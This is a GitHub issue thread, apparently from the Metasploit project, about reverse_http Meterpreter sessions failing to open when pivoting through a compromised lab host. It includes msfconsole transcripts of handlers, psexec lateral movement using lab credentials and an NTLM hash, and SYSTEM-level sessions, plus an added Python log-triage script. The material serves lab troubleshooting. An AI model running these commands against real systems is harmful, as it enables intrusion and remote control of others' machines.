Closed MDhouiou closed 5 months ago
I'm thinking there's a configuration error here. Would it be possible for you to share the output of `show options`?

Hi Spencer,
Here is the configuration of the VMs:

First scenario, with two Linux target VMs:
- Kali: 172.16.1.200/24
- Debian (first target): 172.16.1.10/24
- Debian (second target): 172.16.1.20/24

Second scenario, with Linux and Windows target VMs:
- Kali: 172.16.1.200/24
- Debian (first target): 172.16.1.10/24
- Windows (second target): 172.16.1.100/24
And here is the copied text from the msfconsole with the payload options:

```
msf6 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set PAYLOAD linux/x64/meterpreter_reverse_http
PAYLOAD => linux/x64/meterpreter_reverse_http
msf6 exploit(multi/handler) > set LHOST 172.16.1.200
LHOST => 172.16.1.200
msf6 exploit(multi/handler) > set LPORT 3980
LPORT => 3980
msf6 exploit(multi/handler) > show options

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Payload options (linux/x64/meterpreter_reverse_http):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  172.16.1.200     yes       The local listener hostname
   LPORT  3980             yes       The local listener port
   LURI                    no        The HTTP Path


Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target


View the full module info with the info, or info -d command.

msf6 exploit(multi/handler) > run -j
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
msf6 exploit(multi/handler) >
[*] Started HTTP reverse handler on http://172.16.1.200:3980
[*] http://172.16.1.200:3980 handling request from 172.16.1.10; (UUID: ghwp07xt) Redirecting stageless connection from /zk_HKJofBAD2T_BNk76ARwUXNNxKiAdLGTEbkDxyqw6Nn5UVKVWBTlMuEK with UA 'Mozilla/5.0 (Macintosh; Intel Mac OS X 14_0) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.5 Safari/605.1.15'
[*] http://172.16.1.200:3980 handling request from 172.16.1.10; (UUID: ghwp07xt) Redirecting stageless connection from /zk_HKJofBAD2T_BNk76ARw0AgELhZdc5oi0NuuuQkYPNKLjQsVygYEOs2rOeVujNJ6ERY1D-saOg0Eamx94KUdIrdtQJpIZtayQpQziToz with UA 'Mozilla/5.0 (Macintosh; Intel Mac OS X 14_0) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.5 Safari/605.1.15'
[*] http://172.16.1.200:3980 handling request from 172.16.1.10; (UUID: ghwp07xt) Redirecting stageless connection from /zk_HKJofBAD2T_BNk76ARw8ZyB1bn with UA 'Mozilla/5.0 (Macintosh; Intel Mac OS X 14_0) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.5 Safari/605.1.15'
[*] http://172.16.1.200:3980 handling request from 172.16.1.10; (UUID: ghwp07xt) Redirecting stageless connection from /zk_HKJofBAD2T_BNk76ARwCRrS8K3T503x6vrUduA2rmApNRQrA7PsGbawYNH8o6j4wV86UT-pBAdVNgYYoKaA1m371Pp-a5-pcLi9MN6h_W_45knsYzMJf8dl3tU with UA 'Mozilla/5.0 (Macintosh; Intel Mac OS X 14_0) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.5 Safari/605.1.15'
[*] http://172.16.1.200:3980 handling request from 172.16.1.10; (UUID: ghwp07xt) Redirecting stageless connection from /zk_HKJofBAD2T_BNk76ARwXM_ddLz17HR16-lrIH7eCD7CP7vNlyNznpivYelTPhStOGQJrlwKaoaFL_Iroqd_bVa9U5REWpNm9rw with UA 'Mozilla/5.0 (Macintosh; Intel Mac OS X 14_0) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.5 Safari/605.1.15'
[*] http://172.16.1.200:3980 handling request from 172.16.1.10; (UUID: ghwp07xt) Attaching orphaned/stageless session...
[*] Meterpreter session 1 opened (172.16.1.200:3980 -> 172.16.1.10:39852) at 2024-03-13 10:46:52 +0100
msf6 exploit(multi/handler) > route add 172.16.1.0/24 1
[*] Route added
msf6 exploit(multi/handler) > set LHOST 172.16.1.10
LHOST => 172.16.1.10
msf6 exploit(multi/handler) > show options

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Payload options (linux/x64/meterpreter_reverse_http):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  172.16.1.10      yes       The local listener hostname
   LPORT  3980             yes       The local listener port
   LURI                    no        The HTTP Path


Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target


View the full module info with the info, or info -d command.

msf6 exploit(multi/handler) > run -j
[*] Exploit running as background job 1.
[*] Exploit completed, but no session was created.
msf6 exploit(multi/handler) >
[*] Started HTTP reverse handler on http://172.16.1.10:3980
msf6 exploit(multi/handler) >
[*] http://172.16.1.10:3980 handling request from 172.16.1.20; (UUID: paiwgyxe) Redirecting stageless connection from /wsH7kz2P3E77yv3InjuMzAfVrCiLtiO7c with UA 'Mozilla/5.0 (Macintosh; Intel Mac OS X 14_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36'
```

Thank you for your support :)
What's the output of the `jobs` command? It should show that the multi/handler module is running and, in the Payload options, that it's listening via the session. That would be an important thing to confirm. Next you should use your session on the first compromised host (Debian 1, 172.16.1.10) and run netstat to ensure that it's listening on 3980.
If all that's in place, you should check that Debian 1 doesn't have any kind of firewall or anything that'd be preventing the connection from the second target.
It looks like everything you've set up is correct, but checking those things can help eliminate some common problems.
Hello, bumping it since I have a similar problem with the `windows/x64/meterpreter/reverse_http` payload.
Pivoting with this payload seems not to be valid and msf does not spawn a session. Here's a snippet from my lab:
```
msf6 exploit(windows/smb/psexec) > show options

Module options (exploit/windows/smb/psexec):

   Name                  Current Setting  Required  Description
   ----                  ---------------  --------  -----------
   SERVICE_DESCRIPTION                    no        Service description to be used on target for pretty listing
   SERVICE_DISPLAY_NAME                   no        The service display name
   SERVICE_NAME                           no        The service name
   SMBSHARE                               no        The share to connect to, can be an admin share (ADMIN$,C$,...) or a normal read/write folder share


   Used when making a new connection via RHOSTS:

   Name       Current Setting                                                    Required  Description
   ----       ---------------                                                    --------  -----------
   RHOSTS     10.10.122.30                                                       no        The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT      445                                                                no        The target port (TCP)
   SMBDomain  dev.cyberbotic.io                                                  no        The Windows domain to use for authentication
   SMBPass    59fc0f884922b4ce376051134c71e22c:59fc0f884922b4ce376051134c71e22c  no        The password for the specified username
   SMBUser    jking                                                              no        The username to authenticate as


   Used when connecting via an existing SESSION:

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SESSION                   no        The session to run this module on


Payload options (windows/x64/meterpreter/reverse_http):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     10.10.123.102    yes       The local listener hostname
   LPORT     5555             yes       The local listener port
   LURI                       no        The HTTP Path


Exploit target:

   Id  Name
   --  ----
   1   PowerShell


View the full module info with the info, or info -d command.

msf6 exploit(windows/smb/psexec) > set LPORT 6666
LPORT => 6666
msf6 exploit(windows/smb/psexec) > exploit
[*] 10.10.122.30:445 - Connecting to the server...
[*] 10.10.122.30:445 - Authenticating to 10.10.122.30:445|dev.cyberbotic.io as user 'jking'...
[*] 10.10.122.30:445 - Executing the payload...
[+] 10.10.122.30:445 - Service start timed out, OK if running a command or non-service executable...
[!] http://10.10.123.102:6666 handling request from 10.10.122.30; (UUID: ajjzjj73) Without a database connected that payload UUID tracking will not work!
[*] http://10.10.123.102:6666 handling request from 10.10.122.30; (UUID: ajjzjj73) Staging x64 payload (202844 bytes) ...
[!] http://10.10.123.102:6666 handling request from 10.10.122.30; (UUID: ajjzjj73) Without a database connected that payload UUID tracking will not work!
[*] Exploit completed, but no session was created.
msf6 exploit(windows/smb/psexec) > sessions

Active sessions
===============

  Id  Name         Type         Information            Connection
  --  ----         ----         -----------            ----------
  6   meterpreter  x64/windows  DEV\jking @ WKSTN-2    10.9.254.6:8080 -> 10.10.122.254:44120 (10.10.122.254)
  7   meterpreter  x64/windows  DEV\bfarmer @ WKSTN-2  10.9.254.6:8080 -> 10.10.122.254:44122 (10.10.123.102)
  8   meterpreter  x64/windows  DEV\bfarmer @ WKSTN-2  10.9.254.6:8080 -> 10.10.122.254:44154 (10.10.122.254)
  9   meterpreter  x64/windows                         10.10.122.30:6666 -> 10.10.122.30:57286 via session 7 (10.10.122.30)

msf6 exploit(windows/smb/psexec) >
[-] Meterpreter session 9 is not valid and will be closed
[*] 10.10.122.30 - Meterpreter session 9 closed. Reason: Died
msf6 exploit(windows/smb/psexec) > jobs

Jobs
====

  Id  Name                           Payload                               Payload opts
  --  ----                           -------                               ------------
  1   Auxiliary: server/socks_proxy
  21  Exploit: multi/handler         windows/x64/meterpreter/reverse_http  http://10.9.254.6:8080
  23  Exploit: multi/handler         windows/x64/meterpreter/reverse_http  http://10.10.123.102:6666 via the meterpreter on session 7
```
MSF is listening on 10.9.254.6 (Kali) and a listener is also set up on the first victim (pivot) on 10.10.123.102, port 6666. I'm trying to spawn a session on the server 10.10.122.30, but the session dies while downloading from the stager. I have tried with another HTTP payload, `windows/x64/meterpreter/reverse_winhttp`, and it seems to work fine. So my best guess is that `reverse_http` is causing some problems while pivoting. And yeah, there's a squid proxy in the lab, which is proxying traffic for the workstations (10.10.123.102).
Yeah, I still can't reproduce any issues here. In my lab setup .128 is my system running Metasploit, .10 is one Windows target and .40 is another. I'm able to open my first Meterpreter session to .10 and then a second to .40 by having Metasploit start a listener on .10. I tried with the reverse_http, reverse_https and reverse_winhttp stagers. All of them worked.
```
metasploit-framework (S:0 J:0) exploit(windows/smb/psexec) > run RHOSTS=192.168.159.10 SMBPass=Password1! LHOST=192.168.159.128 PAYLOAD=windows/x64/meterpreter/reverse_http
[*] Started HTTP reverse handler on http://192.168.159.128:8080
[*] 192.168.159.10:445 - Connecting to the server...
[*] 192.168.159.10:445 - Authenticating to 192.168.159.10:445 as user 'smcintyre'...
[*] 192.168.159.10:445 - Selecting PowerShell target
[*] 192.168.159.10:445 - Executing the payload...
[+] 192.168.159.10:445 - Service start timed out, OK if running a command or non-service executable...
[*] http://192.168.159.128:8080 handling request from 192.168.159.10; (UUID: 5tm6qdwe) Staging x64 payload (202844 bytes) ...
[*] Meterpreter session 13 opened (192.168.159.128:8080 -> 192.168.159.10:49840) at 2024-04-15 10:18:23 -0400

meterpreter > background
[*] Backgrounding session 13...
metasploit-framework (S:1 J:0) exploit(windows/smb/psexec) > run RHOSTS=192.168.159.40 SMBPass=Password2! LHOST=192.168.159.10 ReverseListenerComm=13 PAYLOAD=windows/x64/meterpreter/reverse_http
[*] Started HTTP reverse handler on http://192.168.159.10:8080
[*] 192.168.159.40:445 - Connecting to the server...
[*] 192.168.159.40:445 - Authenticating to 192.168.159.40:445 as user 'smcintyre'...
[*] 192.168.159.40:445 - Selecting PowerShell target
[*] 192.168.159.40:445 - Executing the payload...
[+] 192.168.159.40:445 - Service start timed out, OK if running a command or non-service executable...
[*] http://192.168.159.10:8080 handling request from 192.168.159.40; (UUID: aoiyj5x9) Staging x64 payload (202844 bytes) ...
[*] Meterpreter session 14 opened (192.168.159.40:8080 -> 192.168.159.40:64828 via session 13) at 2024-04-15 10:18:43 -0400

meterpreter > background
[*] Backgrounding session 14...
metasploit-framework (S:2 J:0) exploit(windows/smb/psexec) > sessions

Active sessions
===============

  Id  Name         Type         Information                 Connection
  --  ----         ----         -----------                 ----------
  13  meterpreter  x64/windows  NT AUTHORITY\SYSTEM @ DC    192.168.159.128:8080 -> 192.168.159.10:49840 (192.168.159.10)
  14  meterpreter  x64/windows  NT AUTHORITY\SYSTEM @ DC22  192.168.159.40:8080 -> 192.168.159.40:64828 via session 13 (192.168.159.40)

metasploit-framework (S:2 J:0) exploit(windows/smb/psexec) >
```
I recommend you try to simplify your setup as I did by not using the `exploit/multi/handler` module and just having the psexec exploit start the listener. You can tell it which session to use to start the handler with the `ReverseListenerComm` datastore option.
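As an added example (not Metasploit's code, and not from anyone in this thread), the script below reads the kind of handler output quoted in the three transcripts above and reports, per callback source, how far the handshake got: stalled at the first stageless redirect (the Debian-to-Debian case), staged and then died (the psexec case), or established, directly or via a pivot session (the working run). The sample lines are constructed copies of the thread's output with URIs and User-Agent strings shortened; the "session 9 opened" line is assumed, since the thread shows session 9 only in the sessions table before it is closed.

```python
import re
from collections import defaultdict

# Constructed sample log, modelled on the msfconsole output quoted in this
# thread (URIs, UUID lines and User-Agent strings shortened). The "session 9
# opened" line is assumed: the thread only shows session 9 in the sessions
# table and then the "closed. Reason: Died" line.
SAMPLE_LOG = """\
[*] Started HTTP reverse handler on http://172.16.1.200:3980
[*] http://172.16.1.200:3980 handling request from 172.16.1.10; (UUID: ghwp07xt) Redirecting stageless connection from /zk_HKJofBAD2T_BNk76ARwUXNN with UA 'Mozilla/5.0'
[*] http://172.16.1.200:3980 handling request from 172.16.1.10; (UUID: ghwp07xt) Attaching orphaned/stageless session...
[*] Meterpreter session 1 opened (172.16.1.200:3980 -> 172.16.1.10:39852) at 2024-03-13 10:46:52 +0100
[*] Started HTTP reverse handler on http://172.16.1.10:3980
[*] http://172.16.1.10:3980 handling request from 172.16.1.20; (UUID: paiwgyxe) Redirecting stageless connection from /wsH7kz2P3E77yv3Inju with UA 'Mozilla/5.0'
[!] http://10.10.123.102:6666 handling request from 10.10.122.30; (UUID: ajjzjj73) Without a database connected that payload UUID tracking will not work!
[*] http://10.10.123.102:6666 handling request from 10.10.122.30; (UUID: ajjzjj73) Staging x64 payload (202844 bytes) ...
[*] Meterpreter session 9 opened (10.10.122.30:6666 -> 10.10.122.30:57286 via session 7) at 2024-04-15 09:00:00 +0200
[*] 10.10.122.30 - Meterpreter session 9 closed. Reason: Died
[*] http://192.168.159.10:8080 handling request from 192.168.159.40; (UUID: aoiyj5x9) Staging x64 payload (202844 bytes) ...
[*] Meterpreter session 14 opened (192.168.159.40:8080 -> 192.168.159.40:64828 via session 13) at 2024-04-15 10:18:43 -0400
"""

# One regex per line shape that matters for the handshake.
REQUEST_RE = re.compile(
    r"^\[[*!]\] (?P<url>https?://[\w.:-]+) handling request from (?P<src>[\d.]+); "
    r"\(UUID: (?P<uuid>\w+)\) (?P<event>.+)$")
OPENED_RE = re.compile(
    r"^\[\*\] Meterpreter session (?P<sid>\d+) opened \([\d.]+:\d+ -> (?P<src>[\d.]+):\d+"
    r"( via session (?P<pivot>\d+))?\)")
CLOSED_RE = re.compile(
    r"^\[[*-]\] (?P<src>[\d.]+) - Meterpreter session (?P<sid>\d+) closed\.\s+Reason: (?P<reason>\w+)")


def _new_state():
    return {"handlers": set(), "uuids": set(), "requests": 0,
            "last_event": None, "session": None, "via": None, "reason": None}


def _event_kind(event):
    """Map the free-text tail of a handler line to a coarse handshake step."""
    if event.startswith("Redirecting stageless"):
        return "redirect"   # stageless payload asked for its session URI
    if event.startswith("Staging"):
        return "staging"    # staged payload is downloading the second stage
    if event.startswith("Attaching"):
        return "attach"     # stageless payload is being bound to a session
    return None             # warnings such as the "Without a database" notice


def triage(log_text):
    """Return {callback_src_ip: verdict} describing how far each callback got."""
    state = defaultdict(_new_state)
    for line in log_text.splitlines():
        m = REQUEST_RE.match(line)
        if m:
            s = state[m["src"]]
            s["handlers"].add(m["url"])
            s["uuids"].add(m["uuid"])
            s["requests"] += 1
            kind = _event_kind(m["event"])
            if kind:
                s["last_event"] = kind
            continue
        m = OPENED_RE.match(line)
        if m:
            s = state[m["src"]]
            s["session"] = int(m["sid"])
            s["via"] = int(m["pivot"]) if m["pivot"] else None
            continue
        m = CLOSED_RE.match(line)
        if m and m["src"] in state and state[m["src"]]["session"] == int(m["sid"]):
            state[m["src"]]["reason"] = m["reason"]
    return {src: _verdict(s) for src, s in state.items()}


def _verdict(s):
    if s["session"] is not None and s["reason"] is None:
        status = "established"
    elif s["session"] is not None:
        status = "died"       # opened, then torn down (e.g. Reason: Died)
    elif s["requests"]:
        status = "stalled"    # handler saw the callback but never attached a session
    else:
        status = "no-callback"
    return {"status": status, "handlers": sorted(s["handlers"]),
            "requests": s["requests"], "last_event": s["last_event"],
            "session": s["session"], "via": s["via"], "reason": s["reason"]}


def report(log_text):
    """Human-readable summary, one line per callback source."""
    lines = []
    for src, v in triage(log_text).items():
        where = ", ".join(v["handlers"]) or "-"
        extra = ""
        if v["status"] == "stalled":
            extra = f" (last step: {v['last_event']}; check the listener on {where} and any host firewall)"
        elif v["status"] == "died":
            extra = f" (reason: {v['reason']})"
        via = f" via session {v['via']}" if v["via"] else ""
        lines.append(f"{src}: {v['status']}{via}{extra}")
    return "\n".join(lines)


if __name__ == "__main__":
    print(report(SAMPLE_LOG))
```

Run it against a saved msfconsole log to see which callbacks never got past the redirect or staging step; a source that appears in the output but never reaches `attach` or `session opened` is the pattern of the stalled Debian-to-Debian run above, and the handler URL it reports is the listener whose reachability (the `netstat` and firewall checks suggested earlier) is worth confirming first.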
Hi!
This issue has been left open with no activity for a while now.
We get a lot of issues, so we currently close issues after 60 days of inactivity. It’s been at least 30 days since the last update here. If we missed this issue or if you want to keep it open, please reply here. You can also add the label "not stale" to keep this issue open!
As a friendly reminder: the best way to see this issue, or any other, fixed is to open a Pull Request.
Hi again!
It’s been 60 days since anything happened on this issue, so we are going to close it. Please keep in mind that I’m only a robot, so if I’ve closed this issue in error please feel free to reopen this issue or create a new one if you need anything else.
As a friendly reminder: the best way to see this issue, or any other, fixed is to open a Pull Request.
Hi,
I'm testing some attack scenarios in my home lab. To gain initial access to the first machine, I am utilizing the `linux/x64/meterpreter_reverse_http` payload. Subsequently, I am employing the same payload to facilitate lateral movement to the second machine.
Scenario: Kali ->(meterpreter_reverse_http)->First target (Debian) ->(meterpreter_reverse_http)->Second target (Debian)
While the first session works fine without any problems, when I set up the listener for the second session and run the second payload on the second target VM, it doesn't open the second session.
I do receive the request to the handler, but no session is opened.
[First Session works]
[Second Session not opening]
I've also tested the scenario: Kali ->(linux/x64/meterpreter_reverse_http)->First target (Debian) ->(windows/meterpreter_reverse_http)->Second target (Windows)
In this case, both sessions work without any problem.
So, my question is: why can't the second session be opened in the first scenario?
I would greatly appreciate any assistance or guidance from anyone who can help.
Thank you :)